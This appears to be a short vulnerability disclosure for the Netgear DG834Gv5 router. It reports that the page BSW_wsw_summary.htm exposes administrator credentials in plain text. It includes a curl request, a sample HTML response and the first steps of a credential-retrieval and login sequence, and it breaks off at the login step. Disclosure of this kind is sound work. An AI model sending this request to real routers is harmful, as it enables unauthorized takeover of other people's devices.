A security vulnerability has been identified in the Netgear DG834Gv5 router, where administrative credentials (username and password) are transmitted and displayed in plain text within the web management interface. This exposure can be exploited by an unauthorized attacker to gain administrative access to the device, affecting over 6,440 devices on the Internet.
Netgear DG834Gv5
Firmware Version: V6.00.25, V1.6.01.34
CWE-312 - Cleartext Storage of Sensitive Information
The following HTTP GET request demonstrates the retrieval of a webpage containing the administrative credentials in plain text:
curl "http://<router_ip>:<port>/BSW_wsw_summary.htm"
Response:
HTTP/1.0 200 OK
Content-length: 4042
Content-type: text/html
<html>
...
<tr>
<td width="50%"><b> Login Name</b></td>
<td width="50%">USERNAME</td>
</tr>
<tr>
<td width="50%"><b> Administrator Password:</b></td>
<td width="50%">PASSWORD</td>
</tr>
...
</html>
Notably, When another IP address is managing the device, the message "(ip_address) is managing this device" will appear.
Firmware: V6.00.25
Get the username and password within BSW_wsw_summary.htm
Login to the homepage: